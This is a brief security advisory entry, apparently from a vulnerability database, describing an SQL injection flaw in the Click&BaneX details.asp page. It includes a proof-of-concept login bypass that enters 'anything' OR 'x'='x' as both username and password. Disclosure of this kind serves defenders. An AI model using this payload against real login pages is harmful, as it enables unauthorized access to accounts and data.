|
Click&BaneX Details.ASP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following proof-of-concept example is available: http://www.example.com/index.html?ClickAndRank/details.asp Username: anything' OR 'x'='x Password: anything' OR 'x'='x |
|
Privacy Statement |